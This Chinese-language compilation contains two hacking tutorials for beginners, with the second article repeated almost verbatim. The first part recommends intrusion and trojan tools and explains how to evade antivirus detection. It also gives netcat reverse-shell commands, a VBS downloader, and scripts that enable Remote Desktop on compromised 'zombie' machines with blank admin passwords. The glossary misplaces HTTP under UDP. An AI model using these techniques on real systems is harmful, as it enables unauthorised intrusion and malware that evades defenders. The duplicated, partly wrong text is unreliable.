黑客技术的学习小结（推荐）

黑客技术的学习小结（推荐）
第一篇：黑客技术的学习小结（推荐）
黑客技术的学习小结
------美丽の破船
仔细想想，我学习“网络安全”已经很长时间了！的确收获不小！虽然以前，高中的学习生活压的喘不过气来，但挤出点时间学习“网安”，真是不矣乐乎！
“共享”是我们的基本精神，可是想想我“共享”出来的东西真是少之又少，因此，写出此破烂文章，希望对还没有入门的“菜菜”有所帮助！少走些弯路！
说到“黑客”、“入侵”很大的一部分就是程序的安全性，无疑这一点要求我们应该多少懂得一点编程知识！
下面我介绍一下我网安的大体知识、以帮助那些不知道该从何处下手的朋友：
一、使用工具：
只会用工具的黑客，不是一个好的黑客；但是，一个好的黑客一定会把工具用的出神入化！（比如：魔女の条件：她把一个很普通的RADMIN配置的不得不让人叫绝！）是的，好的工具配合好的方法及灵活的运用，可以很好的为自己提高声势和信心！下面我介绍一些比较经典的工具，仅供参考：
1、扫描工具：
（1）SurperScan 特点：扫描的范围广，内容很详细，准确性也可以！尤其是到了3.0以后，更是增加了许多的特色!（2）X-SCan：这个可能是一个黑客必备的工具之一了！尤其是它那详尽的报告及漏洞修补建议！无一不体现出它功能的强大！
还有X-Way，nmap等等这些都比较常用！大家可以都试一下！
2、脚本少表攻击程序：
（1）NBSI：这个不用我说了吧！本人推荐（911专用版）感觉真的挺好!当然最新的版本已经开始支持对JSP的注入了！
（2）Domain：现在出来3.6版了！呵呵，在用法上没有太多的变化！只是对数据库文件作了些补充！大家可以自己用ACCESS打开它，来补充！
（3）HDSI：这个是教主的工具！它以前的版本不是很好，本人推荐用“安静拓宽版！”这个不错！
（4）CASI：这个是针对PHP环境的注入工具！功能我就不废话了！本人推荐校盟专用版，要是大家有钱！可以去买正式版。

至于CGI环境：我就不多说了！毕竟它的发展前景不是很乐观！
3、密码及嗅探工具：
这样的工具比较多！但大家最好还是懂点协议的基础知识！但是好用的就是那么几个：X-Sniffer，SnifferNT，WinSockExpert等，这些工具的用途都很广！如：提COOKIE，分析数据的传输过程，提取用户名，密码等等，还有一些比较好用的如：CAIN，密码嗅探专家等
密码相关的工具也就是破MD5的穷举程序，破解网页密码的如：朔雪等还有破ACCESS的破PUBWIN的破还原精灵还原卡的，至于盗号的木马。

由于本人比较鄙视这个故，不谈这些！
4、溢出工具
这可能是黑客工具中最为霸道的程序了！只要根据不同的环境选择相应的工具，就可以了！这里我仅介绍与溢出相关的辅助工具的用法！至于具体的程序，大家可以自己去GOOGLE一下1（1）NC.EXE：堪称为瑞士军刀的简易后门程序！主要用于溢出有的网络连接！具体的格式如下；
正向连接；nc.exe-vv ip port 反向连接；nc.exe-vv-L-p PORT （2）TFTPD32.EXE这个我也不用说了吧！如果实在不动大家可以去GOOGLE以下《文件传输方法总结》一文！
（3）MT.EXE；这个也是一个后门程序，游乐他可以完成很多是如；端口转向，克隆帐户、结束进程，替换服务等等1具体的使用方法大家还是去GOOGLE一下吧！
5、木马后门程序及相关的一些工具；
对于任何一个黑棵而言，这是必需的工具，许多的高手豆油自己的木马程序，而我们这些小菜只能用已经公布出来的随时可能被杀的木马程序了！
这里只提三点建议：
（1）不要使用当前正在流行的木马！
（2）我讲一下木马免杀的基本方法！
当前杀毒软件的查杀病毒的方法主要是病毒码核对，知道了这个我们就可以作相应的改动了！
A：刚拿到一个木马程序我们首先用PEID对它进行查壳！若有壳则脱壳
！大家可以到“看雪学院”去找脱壳机1 B：脱完壳之后我们就要开始作免杀了！作免杀木马的大致方法如下：
（a）加一个强壳！如北斗压缩、三层驱动SA等等
（b）加花指令
至于花指令的概念大家去GOOGLE一下，应该会有很大的收获的！
（c）使用CCI定律：
这个其实很简单！用PE EDITOR将木马程序的OEP入口地址加1便可！
（d）手工定位和修改特征码！
这个需要大家有一定的基础知识！等有时间我会专门的写一篇这方面的文章！当然如果上面的几种方法如果大家能够综合还运用也是很强的！
(3)我推荐的木马程序：
a:冬日之恋：这是一个CMD状态下采用C/S模式的木马后门程序！免杀也比较方便功能更是没的说！b；黑社会：这个其实就是RADMIN的扩展版（增加了反向连接功能）！按照魔女の条件提供的配置方法，木马是及少会被查杀的!而且功能、隐藏性都没的说！当然还有很多！比如：流萤，黑洞，PCSHARE等等
二、掌握一些常用的命令；
WINDOWS出台以后，似乎DOS已经离我们很遥远了！但是，DOS的高效性使得我们至今没有能够完全摆脱掉它！比如论坛里还有很多用批处理来理系统垃圾的应用！而且入侵时很大一部分都要用到DOS命令，用到批处理！所以DOS命令大家都是要了解的！关于DOS的具体细节，我等以后作为具体的章节为大家讲解！
三、灵活的脚本攻击：
这个概念比较大！也是当今流行了很长一段时间的攻击技术！因为脚本的范围比较广，大家可以直接利用别人已经写好的程序为我所用（如：Iget.vbs等）当然如果要想真正的用好脚本这一利器，还得自己学好脚本程序！（如：HTML、VBScript、JAVAScript、ASP、PHP等）不要被这么多的语言吓到！其实我们只要将一部分学好便可！大约两个月应该可以搞定!学好这一些对我们以后真正的理解脚本攻击，理解注入、理解跨站、理解COOKIE欺骗等都有很大的帮助！下面我列出几个比较有用的脚本代码：（希望能对大家有所帮助）
1、在CMD环境中下载文件的代码：
Set xPost = CreateObject(“Microsoft.XMLHTTP”)xPost.Open
“GET”,LCase(WScript.Arguments(0)),0 xPost.Send()
Set sGet = CreateObject(“ADODB.Stream”)sGet.Mode = 3 sGet.Type = 1 sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile LCase(WScript.Arguments(1)),2 保存为iget.vbs便可！
使用方法：IGET.VBS 网址保存的文件名
2、开3389的脚本：（共有两种方法）方法1：
echo [Components] > c:sql
echo TSEnable = on >> c:sql
sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q
编辑好后存为BAT文件，上传至肉鸡，执行。

这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。

方法2：
(对xp2000都有效)脚本文件本地开3389 工具:rots1.05 地址:/rots.zip 使用方法：
在命令行方式下使用windows自带的脚本宿主程序cscript.exe 调用脚本，例如：
c:>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项] 服务端口：设置终端服务的服务端口。

默认是3389。

自动重起选项：使用/r表示安装完成后自动重起目标使设置生效。

使用/fr表示强制重起目标。

（如果/r不行，可以试试这个）
使用此参数时，端口设置不能忽略。

比如扫描到了一个有NT弱口令的服务器，IP地址是222.222.222.222，管理员帐户是administrator，密码为空运行CMD（2000下的DOS），我们给它开终端！
命令如下！
cscript reg.vbe 222.222.222.222 administrator “" 3389 /fr
上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启）
脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。

因为pro版不能安装终端服务。

如果你确信脚本判断错误，就继续安装好了。

如果要对本地使用，IP地址为127.0.0.1或者一个点（用.表示），用户名和密码都为空（用”“表示）。

脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚本就没用了。

3、列进程的脚本
WScript.echo”PID ProcessName“ for each ps in getobject(”winmgmts:.rootcimv2:win32_Process“).instances_ '
这里有个空格
Wscript.echo ps.handle&vbtab& next 将它保存为LIST.VBE 运行时只要用：cscript list.vbe便可！
4、杀进程的脚本！
dim bag,pipe,honker,good do good=”.“ set bag=getobje ct(”winmgmts:“&good&”rootcimv2“)setpipe= bag.execquery(”select * from sin32_process where name=“进程名”)for each i in pipe i.terminate()next wscript.sleep 1 loop 将它保存为kill.vbs便可用了!其它方面,比如程序语言这种老生常谈的学习问题,我想大家每个人都有不同的方法!不用我来说了!至于具体的入侵方法比如怎么跨站,怎么注入,怎么溢出,怎么用软件,我们等具体问题具体分析!我在这里就先偷个懒了!呵呵
第二篇：我们都从那些角度着手开始学习黑客技术--黑客内参我们都从那些角度着手开始学习黑客技术--黑客内参
我本人是一个黑客技术的爱好者啊！不过文采一般，这篇文章，是我在黑客内参上认识的一个大牛的他写的，同时也在黑客内参发表了，而且这位大牛非常的乐于助人，我特喜欢和他聊天交流真的能够得到很多的干货！
接下来我就借他的文字来给各位看一看！我们这些喜欢黑客技术的人，该从何处着手开始学习黑客技术！同时也感谢一下黑内参给我提供了这么一个机会能够和大牛相遇！谢谢！
学习黑客知识前，首先要了解黑客常见的术语与命令，当然，进程、端口、IP地址等基础知识也是很必要的。

什么是黑客？
有些人习惯性认为黑客是电脑的侵入者，而且很多时候代表的是一个贬义的名词，其实黑客指代的是拥有熟练电脑技术的人，并无明显的褒义贬义之分，其中，在黑客的领域里，有一类黑客叫白帽黑客，这类人是有能力破坏电脑安全但是不具有恶意目的的黑客，他们一般有着清楚的道德规范，并常常试图同企业合作去改善被发现的安全弱点。

对应的还有黑帽黑客/黑帽怪和灰帽黑客。

黑客：源自于英文hacker，是对水平高超的电脑专家(尤其是程序设计人员)的一个统称。

红客：维护国家利益，不去利用网络技术入侵自己国家电脑，而是维护正义，为自己国家争光的黑客。

蓝客：提倡爱国主义的黑客们，经常用自己的力量来维护网络和平。

骇客：源自于英文Cracker，经常从事恶意破解商业软件、恶意入侵别人的网络等事物。

看到这里，大家应该明白了吧，骇客才是我们应该认为的不合法的电脑侵入者，或许因为hacker的发音类似于骇客，却被翻译成黑客，才会引起这番误解吧。

黑客需要掌握的知识
成为一名黑客，并没有想象中那么简单，不仅需要熟练掌握一定的英文、理解常用的黑客术语和网络安全术语、熟练使用常用DOS命令和黑客工具，而且需要掌握主流的编程语言及脚本。

掌握英文：一个漏洞从发现到出现中文介绍，需要大约一周时间，而一周时间足以让网络管理员修补漏洞了，如果等中文介绍出现，可能这个漏洞已经不存在了，因此，想成为一名黑客，一开始就要尽量阅读英文资料、使用英文软件，且及时关注国外著名的网络安全网站。

理解术语：如果对黑客术语不理解，当你与其他黑客交流技术或经验时就会显得吃力，如果对网络安全术语不理解，那么，排查问题并解决问题时也会遇到一定的阻碍。

DOS命令与黑客工具：这些可以帮助你扫描漏洞及排查漏洞存在的原因及解决方案。

编程语言及脚本：很多漏洞的出现都会介入在语言中，比如我们熟知的SQL注入引入的数据安全问题，因此，学习编程语言及脚本也是有必要的。

黑客常用术语
肉鸡：比喻那些可以随意被黑客控制的电脑，黑客在操作它们的时候不会被对方发觉。

木马：伪装成正常程序的病毒程序，当这些被程序运行时，会获取系统的整个控制权限。

网页木马：伪装成普通网页的木马网页或将木马的代码直接插入到正常的网页文件中，当有人访问时，网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马服务端下载到访问者的电脑上来自动执行。

挂马：在别人的网站文件里面放入网页木马或将代码潜入到对方正常的网页文件里，使浏览者中木马病毒。

后门：黑客在利用某些方法成功地控制了目标主机后，可以在对方的系统中植入特地的程序，或者修改某些设置。

大多数特洛伊木马程序都可以被入侵者用于制作后门。

IPC$：共享“命名管道”的资源，是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限，在远程管理计算机和查看计算机的共享资源时使用。

弱口令：强度不够，容易被猜解的密码。

Shell：命令运行环境。

WebShell：以ASP, PHP, JSP或者CGI等网页文件形式存在的一种命令执行环境，也可以将其称作是一种网页后门。

溢出：缓冲区溢出，程序对接受的输入数据没有执行有效的检测而导致错误，后果可能是造成程序崩溃或者执行攻击者的命令。

分为堆溢出和栈溢出。

SQL注入：用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些要获得的数据，就是SQL注入。

注入点：可以实行注入的地方，通常是一个访问数据库的连接，根据注入点数据库的运行账号权限的不同，所得到的权限也不同。

内网：局域网。

查看IP时，如果在以下三个范围内，就说明这电脑是处于内网之中：10.0.0.0~10.255.255.255, 172.16.0.0~172.31.255.255, 192.168.0.0~192.168.255.255 外网：互联网，全球性的互联网络。

比如中国的电脑上网访问美国的微软官网。

外网IP地址是可以进行全球连接的。

免杀：通过加壳、加密、修改特征码、加花指令等技术来修改程序，使其逃过杀毒软件的查杀。

加壳：利用特殊的算法，将exe可执行程序或dll动态链接库文件的编码进行改变(如实现压缩、加密),以达到缩小文件体积或加密程序
编码，甚至躲过杀毒软件的查杀目的。

目前较常用的壳有UPX, ASPack, PePack, PECompact, UPack等。

花指令：让汇编语句进行一些跳转，使得杀毒软件不能正常地判断病毒文件的构造。

进程
进程是程序在计算机上的一次执行活动。

当运行一个程序，就启动了一个进程。

显然，程序是静态的，进程是动态的。

进程分为系统进程和用户进程两种。

凡是用于完成操作系统的各种功能的进程就是系统进程，它们就是处于运行状态下的操作系统本身。

用户进程就是所有由用户启动的进程，进程是操作系统进行资源分配的单位。

端口
端口可认为是计算机与外界通信交流的出口。

其中硬件领域的端口又称为接口，如USB端口，串行端口等。

软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口，是一种抽象的软件结构，包括一些数据结构和I/O缓冲区。

端口是传输层的内容，是面向连接的，它们对应着网络上常见的一些服务。

如TCP端口(面向连接，如打电话)，UDP端口(无连接，如写信)两种。

在网络中可以被命名和寻址的通信端口是一种可分配资源，由网络OSI协议可知，传输层提供进程通信能力，网络通信的最终地址不仅包括主机地址，还包括可描述进程的某种标识。

因此，当应用程序通过系统调用与某端口建立连接之后，传输层传给该端口的数据都被相应的进程所接收，相应进程发给传输层的数据都从该端口输出。

端口分类按端口号分：
公认端口：包括端口号0~1023，它们紧密绑定于一些服务，通常这些端口的通信明确表明了某种服务的协议。

注册端口：包括端口号1024~49151，它们松散地绑定于一些服务。

动态和/或私有端口：包括端口号49152~65535，理论上，不应为服务分配这些端口，但是一些木马和病毒喜欢这样的端口，因为其
不易引起人们注意而易屏蔽。

按协议类型分：
使用TCP协议的常见端口：FTP协议端口(21, 定义文件传输协议)，Telnet协议端口(用于远程登录)，SMTP协议端口(25，邮件服务器使用)，POP3(110，用于接收邮件)。

使用UDP协议的常见端口：HTTP协议端口(80，用户使用最多的协议)，DNS协议端口(53，用于域名解析)，SNMP(161，管理网络设备)，QQ协议端口(提供服务又接收服务，使用无连接协议，使用8000侦听接收消息，4000向外发送消息)。

查看端口
为了查找目标主机上都开放了哪些端口，可以使用某些扫描工具对目标主机进行一定范围内的端口进行扫描。

黑客通常使用这种方法掌握目标主机上的端口开放情况，对目标主机进行攻击的。

在Windows系统中，可以使用netstat命令查看端口：打开cmd 命令窗口输入“netstat-a-n”。

如果在管理员不知情的情况下打开了太多端口，容易引发危险，因此，如果管理员不了解服务器提供的服务，就会降低系统的安全系数。

我本人是一个黑客技术的爱好者啊！不过文采一般，这篇文章，是我在黑客内参上认识的一个大牛的他写的，同时也在黑客内参发表了，而且这位大牛非常的乐于助人，我特喜欢和他聊天交流真的能够得到很多的干货！
接下来我就借他的文字来给各位看一看！我们这些喜欢黑客技术的人，该从何处着手开始学习黑客技术！同时也感谢一下黑客内参给我提供了这么一个机会能够和大牛相遇！谢谢！
学习黑客知识前，首先要了解黑客常见的术语与命令，当然，进程、端口、IP地址等基础知识也是很必要的。

什么是黑客？
有些人习惯性认为黑客是电脑的侵入者，而且很多时候代表的是一个贬义的名词，其实黑客指代的是拥有熟练电脑技术的人，并无明显的褒义贬义之分，其中，在黑客的领域里，有一类黑客叫白帽黑客，
这类人是有能力破坏电脑安全但是不具有恶意目的的黑客，他们一般有着清楚的道德规范，并常常试图同企业合作去改善被发现的安全弱点。

对应的还有黑帽黑客/黑帽怪和灰帽黑客。

黑客：源自于英文hacker，是对水平高超的电脑专家(尤其是程序设计人员)的一个统称。

红客：维护国家利益，不去利用网络技术入侵自己国家电脑，而是维护正义，为自己国家争光的黑客。

蓝客：提倡爱国主义的黑客们，经常用自己的力量来维护网络和平。

骇客：源自于英文Cracker，经常从事恶意破解商业软件、恶意入侵别人的网络等事物。

看到这里，大家应该明白了吧，骇客才是我们应该认为的不合法的电脑侵入者，或许因为hacker的发音类似于骇客，却被翻译成黑客，才会引起这番误解吧。

黑客需要掌握的知识
成为一名黑客，并没有想象中那么简单，不仅需要熟练掌握一定的英文、理解常用的黑客术语和网络安全术语、熟练使用常用DOS命令和黑客工具，而且需要掌握主流的编程语言及脚本。

掌握英文：一个漏洞从发现到出现中文介绍，需要大约一周时间，而一周时间足以让网络管理员修补漏洞了，如果等中文介绍出现，可能这个漏洞已经不存在了，因此，想成为一名黑客，一开始就要尽量阅读英文资料、使用英文软件，且及时关注国外著名的网络安全网站。

理解术语：如果对黑客术语不理解，当你与其他黑客交流技术或经验时就会显得吃力，如果对网络安全术语不理解，那么，排查问题并解决问题时也会遇到一定的阻碍。

DOS命令与黑客工具：这些可以帮助你扫描漏洞及排查漏洞存在的原因及解决方案。

编程语言及脚本：很多漏洞的出现都会介入在语言中，比如我们熟知的SQL注入引入的数据安全问题，因此，学习编程语言及脚本也是有必要的。

黑客常用术语
肉鸡：比喻那些可以随意被黑客控制的电脑，黑客在操作它们的
时候不会被对方发觉。

木马：伪装成正常程序的病毒程序，当这些被程序运行时，会获取系统的整个控制权限。

网页木马：伪装成普通网页的木马网页或将木马的代码直接插入到正常的网页文件中，当有人访问时，网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马服务端下载到访问者的电脑上来自动执行。

挂马：在别人的网站文件里面放入网页木马或将代码潜入到对方正常的网页文件里，使浏览者中木马病毒。

后门：黑客在利用某些方法成功地控制了目标主机后，可以在对方的系统中植入特地的程序，或者修改某些设置。

大多数特洛伊木马程序都可以被入侵者用于制作后门。

IPC$：共享“命名管道”的资源，是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限，在远程管理计算机和查看计算机的共享资源时使用。

弱口令：强度不够，容易被猜解的密码。

Shell：命令运行环境。

WebShell：以ASP, PHP, JSP或者CGI等网页文件形式存在的一种命令执行环境，也可以将其称作是一种网页后门。

溢出：缓冲区溢出，程序对接受的输入数据没有执行有效的检测而导致错误，后果可能是造成程序崩溃或者执行攻击者的命令。

分为堆溢出和栈溢出。

SQL注入：用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些要获得的数据，就是SQL注入。

注入点：可以实行注入的地方，通常是一个访问数据库的连接，根据注入点数据库的运行账号权限的不同，所得到的权限也不同。

内网：局域网。

查看IP时，如果在以下三个范围内，就说明这电脑是处于内网之中：10.0.0.0~10.255.255.255, 172.16.0.0~172.31.255.255, 192.168.0.0~192.168.255.255 外网：互联网，全球性的互联网络。

比如中国的电脑上网访问美国的微软官网。

外网IP地址是可以进行全球连接的。

免杀：通过加壳、加密、修改特征码、加花指令等技术来修改程序，使其逃过杀毒软件的查杀。

加壳：利用特殊的算法，将exe可执行程序或dll动态链接库文件的编码进行改变(如实现压缩、加密),以达到缩小文件体积或加密程序编码，甚至躲过杀毒软件的查杀目的。

目前较常用的壳有UPX, ASPack, PePack, PECompact, UPack等。

花指令：让汇编语句进行一些跳转，使得杀毒软件不能正常地判断病毒文件的构造。

进程
进程是程序在计算机上的一次执行活动。

当运行一个程序，就启动了一个进程。

显然，程序是静态的，进程是动态的。

进程分为系统进程和用户进程两种。

凡是用于完成操作系统的各种功能的进程就是系统进程，它们就是处于运行状态下的操作系统本身。

用户进程就是所有由用户启动的进程，进程是操作系统进行资源分配的单位。

端口
端口可认为是计算机与外界通信交流的出口。

其中硬件领域的端口又称为接口，如USB端口，串行端口等。

软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口，是一种抽象的软件结构，包括一些数据结构和I/O缓冲区。

端口是传输层的内容，是面向连接的，它们对应着网络上常见的一些服务。

如TCP端口(面向连接，如打电话)，UDP端口(无连接，如写信)两种。

在网络中可以被命名和寻址的通信端口是一种可分配资源，由网络OSI协议可知，传输层提供进程通信能力，网络通信的最终地址不仅包括主机地址，还包括可描述进程的某种标识。

因此，当应用程序通过系统调用与某端口建立连接之后，传输层传给该端口的数据都被相应的进程所接收，相应进程发给传输层的数据都从该端口输出。

端口分类按端口号分：
公认端口：包括端口号0~1023，它们紧密绑定于一些服务，通常这些端口的通信明确表明了某种服务的协议。